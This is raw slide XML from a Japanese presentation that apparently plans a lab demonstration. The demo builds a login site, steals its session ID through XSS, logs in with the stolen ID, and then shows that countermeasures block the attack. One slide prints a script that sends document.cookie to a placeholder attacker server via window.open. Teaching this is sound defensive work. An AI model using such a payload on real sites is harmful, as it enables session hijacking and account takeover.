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3" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="26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2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B3B620-F619-46DD-B6BC-E83F2EFED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0A1BF9-FF1E-4945-960F-4594CEB5F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F4069D-718D-45A8-A604-FA9E01A6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7FE2B5-576C-4B03-9A4D-B303C28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592B4D-8FD4-401E-91DF-0B0E28F0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21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79399-1742-420E-83F8-36E695EA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A941AC-1103-4757-94D9-475F3CC1C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1E703D-5CD8-41AD-BDC5-B9B5705D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6D0D71-1507-4409-AEC1-1A49CE37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F43FAC-1540-44D4-A174-631BAF37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39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7F0B82-1FC8-4749-8BE0-504A113EB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696F5E-0F27-439A-8112-E92E6E0D4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D9EDC6-0260-4E50-B995-9D22B920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6F5053-B066-441B-8E00-01968DD3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9B60BB-1D9C-4931-913B-9FF1555B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12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9DC0D6-A96B-4AB6-8568-1EFC93CA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9608A8-C499-4EAA-825D-31A7957B6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ED0052-6E94-472E-9D27-E139A3003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2C6A64-268A-4558-9D8B-946716C3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4A0319-B99B-4597-BA56-30DD2B66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39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344BB-50DB-4703-A224-332BAB7D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72535E8-F1B8-4FE5-8C6B-C5CE2AE94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B17325-4226-4A23-B209-B0A7BADC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92C739-ED8B-4933-8A41-A93DBFF8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CEF8F-4659-4302-A488-1C1FCAAE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83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DBFB7A-9E5F-4C6A-82C9-A2AE75B4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AC5119-41BB-4200-B7C6-3172B1C6F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AC1A63B-9272-426D-8D71-7C586ACD5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8BE1C3-3494-42E1-A712-E8623887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D3B60D0-51B5-46A2-9A35-19EC92FC9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8E0305-CB06-4480-9F91-021BC060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23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4F58A2-0C8D-4969-B0C4-7C4E1BC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83C54B-181F-42B0-ADD3-2A06BF2CC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FEBDC61-B1FA-4449-AB9F-879266504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3560A24-9484-4A38-A659-70776934E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2D88CE8-0974-4874-B900-9176D1B13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24D994A-EA98-4B53-AE6E-9B4A5F31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87CBB6-8525-4B0E-9E48-CA81524A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0EBAC2-9351-4D5E-A337-9C6AE9062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27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159AF3-C386-4936-AD87-4E317FE1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7987D1A-6C92-48E5-B0E8-5B92018D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1F554D0-42E2-4998-9342-D194E277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069F7CE-FEE1-4F09-A279-E95D56CA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03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9390DCE-12F2-430B-9E7C-FD6562D3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3AE351D-B4F9-4BC7-9019-DA6B2FEB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66137C-0D47-445D-87E1-E035DD83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35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1635A4-2C33-4980-8DC4-A7800BA6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D2FF7F-9B7C-4711-BAAB-941B641CD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5828048-B695-4DA1-A61A-D461C14EA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60E009-EAE3-4225-8705-9B24CBFB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401825F-3B19-44C5-A225-41573B8C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DFC1BA-A474-426F-917A-F7191388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70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7D3914-183E-4276-90B7-D16472D6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E43170D-874E-45A4-8C1B-A8F48E7F6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7E598BB-78D8-45DD-BA09-DA98E0D27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60386D-DB57-4E3C-A2BB-AA305AC6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98EAE4-977F-4838-A175-76D51781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98619E-BBA1-40AE-90BC-554EA0B0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12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170416B-1F69-4CCB-AA5C-8CC2D0637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7180AA-F1A0-4DE4-90CE-9FF448BAF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37336D-F2D4-4351-B3D5-F27B1BE77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C8131-6993-43B8-83F2-BF339EF1D99D}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>2023/7/25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399B95-BC6A-4981-8D26-B16E5A866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E7EE6E-BECC-4ECA-8762-2F0A39698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152B2-9EA5-4BF8-A26B-04EB0D9EC4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35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F6C9041-F025-49C9-8853-0976D8A93202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781665" y="737419"/>
            <a:ext cx="107515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大まかな要件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>サーバの構築（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>XAMPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>以外で仮想</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>上で構築）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>ページに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>ID/PASS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>によるログイン機能を実装する</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>これを正規サイトとする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・攻撃者となり</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>を利用して正規サイトの</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>　　　　　　　　　　　セッション奪取を実施（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・奪取したセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>を利用して不正にログインする（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>A,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>の流れを実演し、不正にログインを行う。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>A,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>の流れを対策したうえで実演し、できないことを証明する。</a:t>
            </a:r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3886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ハッカーのイラスト | かわいいフリー素材集 いらすとや">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D1FAAE-B4AE-4BA3-A26D-96FAA8CB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212" y="4593591"/>
            <a:ext cx="1461214" cy="146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ウェブサイトのイラスト">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8516209A-3939-41F6-8376-20154F464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54" y="327115"/>
            <a:ext cx="1524644" cy="152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パソコンを使う男性のイラスト">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87F0D015-DC6F-4C94-B275-68A9209DA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2" y="4985965"/>
            <a:ext cx="1587270" cy="158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82863ECA-4753-48A2-9792-3A2B59F29071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262627" y="930215"/>
            <a:ext cx="2251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①正規</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>サーバにスクリプトを仕掛ける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A1E13F4-BC48-421A-A8B5-5E383B4E8C53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9715208" y="3471388"/>
            <a:ext cx="2502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⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>取得した情報をもとに正規サイトにログイン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8692A6D-C1CC-4060-8B9D-591D9C4AA9AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2313459" y="5236411"/>
            <a:ext cx="2747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③攻撃者が用意したサーバにセッション情報を送信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400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9A59148-DF99-4380-8274-D924F92CDC96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295203" y="3899273"/>
            <a:ext cx="249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②仕込まれたスクリプトを実行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="矢印: 下 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5101CE0D-0744-49EF-8E8E-0204973B9DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7616722">
            <a:off x="7965284" y="1372881"/>
            <a:ext cx="327252" cy="2583784"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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矢印: 下 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529CCA8E-5772-494D-A91E-EBBA752E3AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2827620">
            <a:off x="3262547" y="1384395"/>
            <a:ext cx="327252" cy="2583784"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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矢印: 下 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4427E51-A1F7-455F-8762-ADEE83D21D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5681394" y="1397129"/>
            <a:ext cx="307733" cy="7106288"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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EA4336A-5D85-41D3-B8A7-C03562159EF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368308" y="5364101"/>
            <a:ext cx="2510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④セッション情報を取得</a:t>
            </a:r>
            <a:endParaRPr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288DF1-BFF2-4D2A-90BC-B476E7089E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590797" y="757678"/>
            <a:ext cx="3495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全体の流れ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73809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ハッカーのイラスト | かわいいフリー素材集 いらすとや">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7891BE1D-7205-4F89-8826-B85C9ECFE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212" y="4593591"/>
            <a:ext cx="1461214" cy="146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ウェブサイトのイラスト">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C222BC98-F56F-4164-87CB-A4401345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278" y="267856"/>
            <a:ext cx="1524644" cy="152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パソコンを使う男性のイラスト">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC1D4F1-C061-47F3-BCB3-C2C8CF17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2" y="4985965"/>
            <a:ext cx="1587270" cy="158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5AB427-31FF-4EEC-B3DD-1E1DAC73B78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8358879" y="1751457"/>
            <a:ext cx="342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①正規</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>サーバにスクリプトを仕掛ける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1E4AD1-DCBC-4BA7-A579-B000CDF9F029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9605223" y="3492538"/>
            <a:ext cx="273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⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>取得した情報をもとに正規サイトにログイン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2FD065-1C95-47D8-A048-97340C3577FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2068345" y="5289213"/>
            <a:ext cx="3187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③攻撃者が用意したサーバにセッション情報を送信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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73C8FE-CE26-45E8-BFC7-399F3E4EF954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295203" y="3899273"/>
            <a:ext cx="249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②仕込まれたスクリプトを実行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400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87A8F96C-F4A3-4997-BA02-02CBA4557113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7616722">
            <a:off x="8348741" y="1554152"/>
            <a:ext cx="327252" cy="2583784"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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D9A87D26-103C-47C7-8580-31FEE1071F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2827620">
            <a:off x="2962827" y="1558755"/>
            <a:ext cx="327252" cy="2583784"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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1C8AD747-4E09-49BD-81E0-8DBCD5DDE2EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5681394" y="1397129"/>
            <a:ext cx="307733" cy="7106288"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 187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286088-7128-4C39-8164-272931197655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7368308" y="5364101"/>
            <a:ext cx="2510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④セッション情報を取得</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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5AFFFC6-D770-4704-81A5-A1F5DC7313AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2477411" y="368458"/>
            <a:ext cx="3804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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>サーバの構築</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>・</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>ページに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ID/PASS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>によるログイン機能を実装する</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>※</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>これを正規サイトとする。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1EA427-3857-424C-8F2D-96B0AB02ABC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469439" y="3270152"/>
            <a:ext cx="2731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・攻撃者となり</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>を利用して正規サイトの　　　　　　　セッション奪取を実施（①②④）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125909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4A532A-FAB6-4595-80CF-5A3656879EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1916636" y="824894"/>
            <a:ext cx="79752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悪意のあるスクリプト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・フォームに悪意のあるスクリプトを埋め込む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・セッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>を攻撃者のサーバに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>送信するスクリプト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情報を取得するためのサーバ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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>送信されたセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>を保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>存する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Edit this cookie</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>の書き換えができる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>の拡張機能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・奪取したセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>に上書きする</a:t>
            </a:r>
            <a:endParaRPr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87E01F-9F20-4473-BCA7-CDD21087D631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554668" y="240119"/>
            <a:ext cx="3616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攻撃者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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13589DD6-2950-4136-AA30-49FE08C76F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362764" y="1883697"/>
            <a:ext cx="8891110" cy="2330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E3BB606-7137-4093-A1C7-4F29CD819238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362763" y="2171656"/>
            <a:ext cx="8658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ja-JP" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> = ‘http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>攻撃者サーバ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>index.php?SESSIONID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>, '_blank');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でユーザーのセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を取得後、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>リクエストリンクを使用し攻撃者サーバにリダイレクトする。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7974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2E6205A-BCAE-4C24-9E96-A42A87F0F887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469557" y="1562346"/>
            <a:ext cx="112528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OS</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>CentOS7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
